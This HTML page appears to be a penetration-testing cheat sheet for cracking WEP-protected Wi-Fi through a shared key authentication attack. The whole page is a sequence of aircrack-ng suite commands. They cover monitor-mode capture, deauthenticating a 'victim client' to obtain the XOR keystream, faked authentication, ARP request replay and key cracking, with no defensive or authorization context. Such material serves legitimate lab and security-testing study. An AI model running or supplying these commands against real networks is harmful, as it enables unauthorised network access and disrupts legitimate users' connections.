<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>WEP shared Key Authentication Attack</title>
</head><body>WEP shared Key Authentication Attack<br/>
-------------------------------------<br/>
<br/>
Place your wireless card into monitor mode on the channel number of the AP:<br/>
<br/>
airmon-ng start &lt;interface&gt; &lt;AP channel&gt;<br/>
<br/>
Start an Airodump-ng capture, filtering on the AP channel and BSSID, saving the capture:<br/>
<br/>
airodump-ng -c &lt;AP channel&gt; --bssid &lt;AP MAC&gt; -w &lt;capture&gt; &lt;interface&gt;<br/>
<br/>
Deauthenticate the connected client to capture the PRGA XOR keystream:<br/>
<br/>
aireplay-ng -0 1 -a &lt;AP MAC&gt; -c &lt;Client MAC&gt; &lt;interface&gt;<br/>
<br/>
Conduct a fake shared key authentication using the XOR keystream:<br/>
<br/>
aireplay-ng -1 0 -e &lt;ESSID&gt; -y &lt;keystream file&gt; -a &lt;AP MAC&gt; -h &lt;Your MAC&gt;<br/>
&lt;interface&gt;<br/>
<br/>
Launch the ARP request replay attack:<br/>
<br/>
aireplay-ng -3 -b &lt;AP MAC&gt; -h &lt;Your MAC&gt; &lt;interface&gt;<br/>
<br/>
Deauthenticate the victim client again to force the generation of an ARP packet:<br/>
<br/>
aireplay-ng -0 1 -a &lt;AP MAC&gt; -c &lt;Client MAC&gt; &lt;interface&gt;<br/>
<br/>
Once IVs are being generated by the AP, run Aircrack-ng against the capture:<br/>
<br/>
aircrack-ng &lt;capture&gt;</body></html>